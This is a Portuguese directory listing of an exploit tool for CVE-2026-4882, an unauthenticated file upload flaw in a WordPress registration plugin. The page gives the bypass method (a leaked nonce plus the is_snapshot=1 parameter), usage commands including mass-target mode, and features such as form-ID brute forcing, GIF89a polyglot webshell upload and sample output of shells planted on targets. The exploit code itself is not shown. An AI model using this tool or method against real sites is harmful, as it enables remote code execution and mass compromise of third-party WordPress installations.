Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - Upload de Arquivo Arbitrário Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/xshadow-here/cve-2026-4882
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoRed Teaming
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Upload de Arquivo Arbitrário Não Autenticado

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Upload Arbitrário de Arquivo Não Autenticado

Descrição :

O plugin User Registration Advanced Fields para WordPress (versões até e incluindo 1.6.20) é vulnerável a upload arbitrário de arquivo não autenticado através da ação AJAX uraf_profile_picture_upload_method_upload. O plugin vaza um nonce válido através de wp_localize_script() em qualquer página que contenha um formulário de registro, e usando o parâmetro is_snapshot=1 contorna completamente a validação de extensão de arquivo. Isso permite que atacantes não autenticados façam upload de arquivos arbitrários (ex.: webshells PHP disfarçados como imagens GIF), que são armazenados em wp-content/uploads/user_registration_uploads/temp-uploads/, levando à execução remota completa de código (RCE).

INFORMAÇÕES : CVE-2026-4882

~ Pontuação CVSS: 9.8 (Crítico)

~ Versões Afetadas: <= 1.6.20

  • Pesquisador : 0xd4rk5id3 - EnvoraSec

uso :

Alvo único :

  • python3 shadow.py -u https://target.com -s shadow.php

Alvos em massa :

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

Modo interativo :

  • python3 shadow.py
  • insira o nome do arquivo de alvos
  • insira thread 1-50 máx.

funcionalidades :

  • Multithreading
  • Tratamento de erros
  • Descoberta automática de Nonce + ID do Formulário
  • Varredura de Homepage e Sitemap (caminhos de registro personalizados)
  • Fallback de ID do Formulário por Força Bruta
  • Resolução automática de redirecionamentos HTTP/HTTPS
  • Upload de Shell Poliglota GIF89a
  • Verificação de Shell
  • Salvar resultados automaticamente em shell.txt

saída :

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

Aviso legal :

Esta ferramenta é apenas para fins educacionais e de teste de segurança.

O uso não autorizado de sistemas que você não possui ou não tem permissão para testar é ilegal.

Baixar ferramenta